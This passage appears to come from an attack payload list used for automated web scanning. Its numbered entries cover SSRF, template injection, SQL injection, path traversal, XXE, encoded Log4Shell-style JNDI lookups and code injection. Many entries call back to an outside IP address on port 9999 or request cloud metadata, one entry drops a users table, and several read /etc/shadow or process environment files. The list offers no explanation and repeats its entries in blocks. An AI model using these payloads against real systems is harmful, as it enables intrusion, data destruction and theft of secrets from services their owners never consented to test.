w442 [SSRF] dest=http://62.84.182.119:9999/q442
w443 [SSRF] target=http://127.0.0.1:8080/q443
w444 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q444
w445 [SSRF] callback=http://62.84.182.119:9999/q445
w446 [SSRF] next=http://62.84.182.119:9999/q446
w447 [SSRF] return=http://62.84.182.119:9999/q447
w448 [SSRF] website=http://62.84.182.119:9999/q448
w449 [SSRF] uri=http://62.84.182.119:9999/q449&format=json
w450 [SSRF] url=http://62.84.182.119:9999/q450
w451 [SSRF] redirect=http://62.84.182.119:9999/q451
w452 [SSRF] dest=http://62.84.182.119:9999/q452
w453 [SSRF] target=http://127.0.0.1:8080/q453
w454 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q454
w455 [SSRF] callback=http://62.84.182.119:9999/q455
w456 [SSRF] next=http://62.84.182.119:9999/q456
w457 [SSRF] return=http://62.84.182.119:9999/q457
w458 [SSRF] website=http://62.84.182.119:9999/q458
w459 [SSRF] uri=http://62.84.182.119:9999/q459&format=json
w460 [SSRF] url=http://62.84.182.119:9999/q460
w461 [SSRF] redirect=http://62.84.182.119:9999/q461
w462 [SSRF] dest=http://62.84.182.119:9999/q462
w463 [SSRF] target=http://127.0.0.1:8080/q463
w464 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q464
w465 [SSRF] callback=http://62.84.182.119:9999/q465
w466 [SSRF] next=http://62.84.182.119:9999/q466
w467 [SSRF] return=http://62.84.182.119:9999/q467
w468 [SSRF] website=http://62.84.182.119:9999/q468
w469 [SSRF] uri=http://62.84.182.119:9999/q469&format=json
w470 [SSRF] url=http://62.84.182.119:9999/q470
w471 [SSRF] redirect=http://62.84.182.119:9999/q471
w472 [SSRF] dest=http://62.84.182.119:9999/q472
w473 [SSRF] target=http://127.0.0.1:8080/q473
w474 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q474
w475 [SSRF] callback=http://62.84.182.119:9999/q475
w476 [SSRF] next=http://62.84.182.119:9999/q476
w477 [SSRF] return=http://62.84.182.119:9999/q477
w478 [SSRF] website=http://62.84.182.119:9999/q478
w479 [SSRF] uri=http://62.84.182.119:9999/q479&format=json
w480 [SSRF] url=http://62.84.182.119:9999/q480
w481 [SSRF] redirect=http://62.84.182.119:9999/q481
w482 [SSRF] dest=http://62.84.182.119:9999/q482
w483 [SSRF] target=http://127.0.0.1:8080/q483
w484 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q484
w485 [SSRF] callback=http://62.84.182.119:9999/q485
w486 [SSRF] next=http://62.84.182.119:9999/q486
w487 [SSRF] return=http://62.84.182.119:9999/q487
w488 [SSRF] website=http://62.84.182.119:9999/q488
w489 [SSRF] uri=http://62.84.182.119:9999/q489&format=json
w490 [SSRF] url=http://62.84.182.119:9999/q490
w491 [SSRF] redirect=http://62.84.182.119:9999/q491
w492 [SSRF] dest=http://62.84.182.119:9999/q492
w493 [SSRF] target=http://127.0.0.1:8080/q493
w494 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q494
w495 [SSRF] callback=http://62.84.182.119:9999/q495
w496 [SSRF] next=http://62.84.182.119:9999/q496
w497 [SSRF] return=http://62.84.182.119:9999/q497
w498 [SSRF] website=http://62.84.182.119:9999/q498
w499 [SSRF] uri=http://62.84.182.119:9999/q499&format=json

Server-Side Template Injection

w500 [SSTI] name={{7*7}}
w501 [SSTI] val={{config}}
w502 [SSTI] x={{self.__class__}}
w503 [SSTI] test={{config.__class__.__init__.__globals__}}
w504 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w505 [SSTI] input={{request.application.__globals__}}
w506 [SSTI] ref=${7*7}
w507 [SSTI] log=#{7*7}
w508 [SSTI] cmd=<%= 7*7 %>
w509 [SSTI] name={{lipsum.__globals__['os'].popen('echo q509').read()}}
w510 [SSTI] name={{7*7}}
w511 [SSTI] val={{config}}
w512 [SSTI] x={{self.__class__}}
w513 [SSTI] test={{config.__class__.__init__.__globals__}}
w514 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w515 [SSTI] input={{request.application.__globals__}}
w516 [SSTI] ref=${7*7}
w517 [SSTI] log=#{7*7}
w518 [SSTI] cmd=<%= 7*7 %>
w519 [SSTI] name={{lipsum.__globals__['os'].popen('echo q519').read()}}
w520 [SSTI] name={{7*7}}
w521 [SSTI] val={{config}}
w522 [SSTI] x={{self.__class__}}
w523 [SSTI] test={{config.__class__.__init__.__globals__}}
w524 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w525 [SSTI] input={{request.application.__globals__}}
w526 [SSTI] ref=${7*7}
w527 [SSTI] log=#{7*7}
w528 [SSTI] cmd=<%= 7*7 %>
w529 [SSTI] name={{lipsum.__globals__['os'].popen('echo q529').read()}}
w530 [SSTI] name={{7*7}}
w531 [SSTI] val={{config}}
w532 [SSTI] x={{self.__class__}}
w533 [SSTI] test={{config.__class__.__init__.__globals__}}
w534 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w535 [SSTI] input={{request.application.__globals__}}
w536 [SSTI] ref=${7*7}
w537 [SSTI] log=#{7*7}
w538 [SSTI] cmd=<%= 7*7 %>
w539 [SSTI] name={{lipsum.__globals__['os'].popen('echo q539').read()}}
w540 [SSTI] name={{7*7}}
w541 [SSTI] val={{config}}
w542 [SSTI] x={{self.__class__}}
w543 [SSTI] test={{config.__class__.__init__.__globals__}}
w544 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w545 [SSTI] input={{request.application.__globals__}}
w546 [SSTI] ref=${7*7}
w547 [SSTI] log=#{7*7}
w548 [SSTI] cmd=<%= 7*7 %>
w549 [SSTI] name={{lipsum.__globals__['os'].popen('echo q549').read()}}
w550 [SSTI] name={{7*7}}
w551 [SSTI] val={{config}}
w552 [SSTI] x={{self.__class__}}
w553 [SSTI] test={{config.__class__.__init__.__globals__}}
w554 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w555 [SSTI] input={{request.application.__globals__}}
w556 [SSTI] ref=${7*7}
w557 [SSTI] log=#{7*7}
w558 [SSTI] cmd=<%= 7*7 %>
w559 [SSTI] name={{lipsum.__globals__['os'].popen('echo q559').read()}}
w560 [SSTI] name={{7*7}}
w561 [SSTI] val={{config}}
w562 [SSTI] x={{self.__class__}}
w563 [SSTI] test={{config.__class__.__init__.__globals__}}
w564 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w565 [SSTI] input={{request.application.__globals__}}
w566 [SSTI] ref=${7*7}
w567 [SSTI] log=#{7*7}
w568 [SSTI] cmd=<%= 7*7 %>
w569 [SSTI] name={{lipsum.__globals__['os'].popen('echo q569').read()}}
w570 [SSTI] name={{7*7}}
w571 [SSTI] val={{config}}
w572 [SSTI] x={{self.__class__}}
w573 [SSTI] test={{config.__class__.__init__.__globals__}}
w574 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w575 [SSTI] input={{request.application.__globals__}}
w576 [SSTI] ref=${7*7}
w577 [SSTI] log=#{7*7}
w578 [SSTI] cmd=<%= 7*7 %>
w579 [SSTI] name={{lipsum.__globals__['os'].popen('echo q579').read()}}
w580 [SSTI] name={{7*7}}
w581 [SSTI] val={{config}}
w582 [SSTI] x={{self.__class__}}
w583 [SSTI] test={{config.__class__.__init__.__globals__}}
w584 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w585 [SSTI] input={{request.application.__globals__}}
w586 [SSTI] ref=${7*7}
w587 [SSTI] log=#{7*7}
w588 [SSTI] cmd=<%= 7*7 %>
w589 [SSTI] name={{lipsum.__globals__['os'].popen('echo q589').read()}}
w590 [SSTI] name={{7*7}}
w591 [SSTI] val={{config}}
w592 [SSTI] x={{self.__class__}}
w593 [SSTI] test={{config.__class__.__init__.__globals__}}
w594 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
w595 [SSTI] input={{request.application.__globals__}}
w596 [SSTI] ref=${7*7}
w597 [SSTI] log=#{7*7}
w598 [SSTI] cmd=<%= 7*7 %>
w599 [SSTI] name={{lipsum.__globals__['os'].popen('echo q599').read()}}

SQL Injection

w600 [SQLi] id=1' OR 1=1--
w601 [SQLi] id=1' UNION SELECT null,null--
w602 [SQLi] id=1'; DROP TABLE users--
w603 [SQLi] id=1' UNION SELECT 'q603',version()--
w604 [SQLi] id=1' AND SLEEP(5)--
w605 [SQLi] id=1' OR '1'='1
w606 [SQLi] id=1; SELECT pg_sleep(5)--q606
w607 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w608 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q608
w609 [SQLi] id=1%27%20OR%201=1--
w610 [SQLi] id=1' OR 1=1--
w611 [SQLi] id=1' UNION SELECT null,null--
w612 [SQLi] id=1'; DROP TABLE users--
w613 [SQLi] id=1' UNION SELECT 'q613',version()--
w614 [SQLi] id=1' AND SLEEP(5)--
w615 [SQLi] id=1' OR '1'='1
w616 [SQLi] id=1; SELECT pg_sleep(5)--q616
w617 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w618 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q618
w619 [SQLi] id=1%27%20OR%201=1--
w620 [SQLi] id=1' OR 1=1--
w621 [SQLi] id=1' UNION SELECT null,null--
w622 [SQLi] id=1'; DROP TABLE users--
w623 [SQLi] id=1' UNION SELECT 'q623',version()--
w624 [SQLi] id=1' AND SLEEP(5)--
w625 [SQLi] id=1' OR '1'='1
w626 [SQLi] id=1; SELECT pg_sleep(5)--q626
w627 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w628 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q628
w629 [SQLi] id=1%27%20OR%201=1--
w630 [SQLi] id=1' OR 1=1--
w631 [SQLi] id=1' UNION SELECT null,null--
w632 [SQLi] id=1'; DROP TABLE users--
w633 [SQLi] id=1' UNION SELECT 'q633',version()--
w634 [SQLi] id=1' AND SLEEP(5)--
w635 [SQLi] id=1' OR '1'='1
w636 [SQLi] id=1; SELECT pg_sleep(5)--q636
w637 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w638 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q638
w639 [SQLi] id=1%27%20OR%201=1--
w640 [SQLi] id=1' OR 1=1--
w641 [SQLi] id=1' UNION SELECT null,null--
w642 [SQLi] id=1'; DROP TABLE users--
w643 [SQLi] id=1' UNION SELECT 'q643',version()--
w644 [SQLi] id=1' AND SLEEP(5)--
w645 [SQLi] id=1' OR '1'='1
w646 [SQLi] id=1; SELECT pg_sleep(5)--q646
w647 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w648 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q648
w649 [SQLi] id=1%27%20OR%201=1--
w650 [SQLi] id=1' OR 1=1--
w651 [SQLi] id=1' UNION SELECT null,null--
w652 [SQLi] id=1'; DROP TABLE users--
w653 [SQLi] id=1' UNION SELECT 'q653',version()--
w654 [SQLi] id=1' AND SLEEP(5)--
w655 [SQLi] id=1' OR '1'='1
w656 [SQLi] id=1; SELECT pg_sleep(5)--q656
w657 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w658 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q658
w659 [SQLi] id=1%27%20OR%201=1--
w660 [SQLi] id=1' OR 1=1--
w661 [SQLi] id=1' UNION SELECT null,null--
w662 [SQLi] id=1'; DROP TABLE users--
w663 [SQLi] id=1' UNION SELECT 'q663',version()--
w664 [SQLi] id=1' AND SLEEP(5)--
w665 [SQLi] id=1' OR '1'='1
w666 [SQLi] id=1; SELECT pg_sleep(5)--q666
w667 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w668 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q668
w669 [SQLi] id=1%27%20OR%201=1--
w670 [SQLi] id=1' OR 1=1--
w671 [SQLi] id=1' UNION SELECT null,null--
w672 [SQLi] id=1'; DROP TABLE users--
w673 [SQLi] id=1' UNION SELECT 'q673',version()--
w674 [SQLi] id=1' AND SLEEP(5)--
w675 [SQLi] id=1' OR '1'='1
w676 [SQLi] id=1; SELECT pg_sleep(5)--q676
w677 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w678 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q678
w679 [SQLi] id=1%27%20OR%201=1--
w680 [SQLi] id=1' OR 1=1--
w681 [SQLi] id=1' UNION SELECT null,null--
w682 [SQLi] id=1'; DROP TABLE users--
w683 [SQLi] id=1' UNION SELECT 'q683',version()--
w684 [SQLi] id=1' AND SLEEP(5)--
w685 [SQLi] id=1' OR '1'='1
w686 [SQLi] id=1; SELECT pg_sleep(5)--q686
w687 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w688 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q688
w689 [SQLi] id=1%27%20OR%201=1--
w690 [SQLi] id=1' OR 1=1--
w691 [SQLi] id=1' UNION SELECT null,null--
w692 [SQLi] id=1'; DROP TABLE users--
w693 [SQLi] id=1' UNION SELECT 'q693',version()--
w694 [SQLi] id=1' AND SLEEP(5)--
w695 [SQLi] id=1' OR '1'='1
w696 [SQLi] id=1; SELECT pg_sleep(5)--q696
w697 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
w698 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q698
w699 [SQLi] id=1%27%20OR%201=1--

Path Traversal

w700 [Traversal] file=../../../etc/passwd
w701 [Traversal] path=../../../../etc/shadow
w702 [Traversal] page=../../../../../etc/hosts
w703 [Traversal] doc=../../../../../../proc/self/environ
w704 [Traversal] template=../../../../../../../var/log/nginx/access.log
w705 [Traversal] file=....//....//....//etc/passwd
w706 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w707 [Traversal] page=..%252f..%252f..%252fetc/passwd
w708 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w709 [Traversal] file=../../../../etc/nginx/nginx.conf
w710 [Traversal] file=../../../../../etc/passwd
w711 [Traversal] path=../../../../../../etc/shadow
w712 [Traversal] page=../../../../../../../etc/hosts
w713 [Traversal] doc=../../../../../../../../proc/self/environ
w714 [Traversal] template=../../../../../../../../../var/log/nginx/access.log
w715 [Traversal] file=....//....//....//etc/passwd
w716 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w717 [Traversal] page=..%252f..%252f..%252fetc/passwd
w718 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w719 [Traversal] file=../../../../../../etc/nginx/nginx.conf
w720 [Traversal] file=../../../../../../../etc/passwd
w721 [Traversal] path=../../../../../../../../etc/shadow
w722 [Traversal] page=../../../../../../../../../etc/hosts
w723 [Traversal] doc=../../../../../../../../../../proc/self/environ
w724 [Traversal] template=../../../var/log/nginx/access.log
w725 [Traversal] file=....//....//....//etc/passwd
w726 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w727 [Traversal] page=..%252f..%252f..%252fetc/passwd
w728 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w729 [Traversal] file=../../../../../../../../etc/nginx/nginx.conf
w730 [Traversal] file=../../../../../../../../../etc/passwd
w731 [Traversal] path=../../../../../../../../../../etc/shadow
w732 [Traversal] page=../../../etc/hosts
w733 [Traversal] doc=../../../../proc/self/environ
w734 [Traversal] template=../../../../../var/log/nginx/access.log
w735 [Traversal] file=....//....//....//etc/passwd
w736 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w737 [Traversal] page=..%252f..%252f..%252fetc/passwd
w738 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w739 [Traversal] file=../../../../../../../../../../etc/nginx/nginx.conf
w740 [Traversal] file=../../../etc/passwd
w741 [Traversal] path=../../../../etc/shadow
w742 [Traversal] page=../../../../../etc/hosts
w743 [Traversal] doc=../../../../../../proc/self/environ
w744 [Traversal] template=../../../../../../../var/log/nginx/access.log
w745 [Traversal] file=....//....//....//etc/passwd
w746 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w747 [Traversal] page=..%252f..%252f..%252fetc/passwd
w748 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w749 [Traversal] file=../../../../etc/nginx/nginx.conf
w750 [Traversal] file=../../../../../etc/passwd
w751 [Traversal] path=../../../../../../etc/shadow
w752 [Traversal] page=../../../../../../../etc/hosts
w753 [Traversal] doc=../../../../../../../../proc/self/environ
w754 [Traversal] template=../../../../../../../../../var/log/nginx/access.log
w755 [Traversal] file=....//....//....//etc/passwd
w756 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w757 [Traversal] page=..%252f..%252f..%252fetc/passwd
w758 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w759 [Traversal] file=../../../../../../etc/nginx/nginx.conf
w760 [Traversal] file=../../../../../../../etc/passwd
w761 [Traversal] path=../../../../../../../../etc/shadow
w762 [Traversal] page=../../../../../../../../../etc/hosts
w763 [Traversal] doc=../../../../../../../../../../proc/self/environ
w764 [Traversal] template=../../../var/log/nginx/access.log
w765 [Traversal] file=....//....//....//etc/passwd
w766 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w767 [Traversal] page=..%252f..%252f..%252fetc/passwd
w768 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w769 [Traversal] file=../../../../../../../../etc/nginx/nginx.conf
w770 [Traversal] file=../../../../../../../../../etc/passwd
w771 [Traversal] path=../../../../../../../../../../etc/shadow
w772 [Traversal] page=../../../etc/hosts
w773 [Traversal] doc=../../../../proc/self/environ
w774 [Traversal] template=../../../../../var/log/nginx/access.log
w775 [Traversal] file=....//....//....//etc/passwd
w776 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w777 [Traversal] page=..%252f..%252f..%252fetc/passwd
w778 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w779 [Traversal] file=../../../../../../../../../../etc/nginx/nginx.conf
w780 [Traversal] file=../../../etc/passwd
w781 [Traversal] path=../../../../etc/shadow
w782 [Traversal] page=../../../../../etc/hosts
w783 [Traversal] doc=../../../../../../proc/self/environ
w784 [Traversal] template=../../../../../../../var/log/nginx/access.log
w785 [Traversal] file=....//....//....//etc/passwd
w786 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w787 [Traversal] page=..%252f..%252f..%252fetc/passwd
w788 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w789 [Traversal] file=../../../../etc/nginx/nginx.conf
w790 [Traversal] file=../../../../../etc/passwd
w791 [Traversal] path=../../../../../../etc/shadow
w792 [Traversal] page=../../../../../../../etc/hosts
w793 [Traversal] doc=../../../../../../../../proc/self/environ
w794 [Traversal] template=../../../../../../../../../var/log/nginx/access.log
w795 [Traversal] file=....//....//....//etc/passwd
w796 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
w797 [Traversal] page=..%252f..%252f..%252fetc/passwd
w798 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
w799 [Traversal] file=../../../../../../etc/nginx/nginx.conf

XML External Entity

w800 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q800">
w801 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w802 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q802.dtd">
w803 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w804 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q804">
w805 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q805">
w806 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w807 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q807.dtd">
w808 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w809 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q809">
w810 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q810">
w811 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w812 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q812.dtd">
w813 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w814 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q814">
w815 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q815">
w816 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w817 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q817.dtd">
w818 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w819 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q819">
w820 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q820">
w821 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w822 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q822.dtd">
w823 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w824 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q824">
w825 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q825">
w826 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w827 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q827.dtd">
w828 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w829 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q829">
w830 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q830">
w831 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w832 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q832.dtd">
w833 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w834 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q834">
w835 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q835">
w836 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w837 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q837.dtd">
w838 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w839 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q839">
w840 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q840">
w841 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w842 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q842.dtd">
w843 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w844 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q844">
w845 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q845">
w846 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
w847 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q847.dtd">
w848 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
w849 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q849">

Encoded Payload Variants

w850 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w851 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w852 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w853 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w854 [Encoded] q854=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
w855 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w856 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w857 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w858 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w859 [Encoded] q859=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
w860 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w861 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w862 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w863 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w864 [Encoded] q864=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
w865 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w866 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w867 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w868 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w869 [Encoded] q869=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
w870 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w871 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w872 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w873 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w874 [Encoded] q874=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
w875 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w876 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w877 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w878 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w879 [Encoded] q879=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
w880 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w881 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w882 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w883 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w884 [Encoded] q884=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
w885 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w886 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w887 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w888 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w889 [Encoded] q889=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
w890 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w891 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w892 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w893 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w894 [Encoded] q894=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
w895 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
w896 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
w897 [Encoded] id=$(ping%20-c1%2062.84.182.119)
w898 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
w899 [Encoded] q899=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D

Language-Specific Injection

w900 [Lang] cmd=__import__('os').system('echo q900')
w901 [Lang] val=eval('__import__("os").popen("id").read()')
w902 [Lang] x=system('echo q902')
w903 [Lang] data=passthru('echo q903')
w904 [Lang] ref=<?php system('echo q904'); ?>
w905 [Lang] exec=`echo q905`
w906 [Lang] cmd=%x(echo q906)
w907 [Lang] val=system('echo q907')
w908 [Lang] data=require('child_' + 'process').exec('echo q908')
w909 [Lang] cmd=Runtime.getRuntime().exec('echo q909')
w910 [Lang] cmd=__import__('os').system('echo q910')
w911 [Lang] val=eval('__import__("os").popen("id").read()')
w912 [Lang] x=system('echo q912')
w913 [Lang] data=passthru('echo q913')
w914 [Lang] ref=<?php system('echo q914'); ?>
w915 [Lang] exec=`echo q915`
w916 [Lang] cmd=%x(echo q916)
w917 [Lang] val=system('echo q917')
w918 [Lang] data=require('child_' + 'process').exec('echo q918')
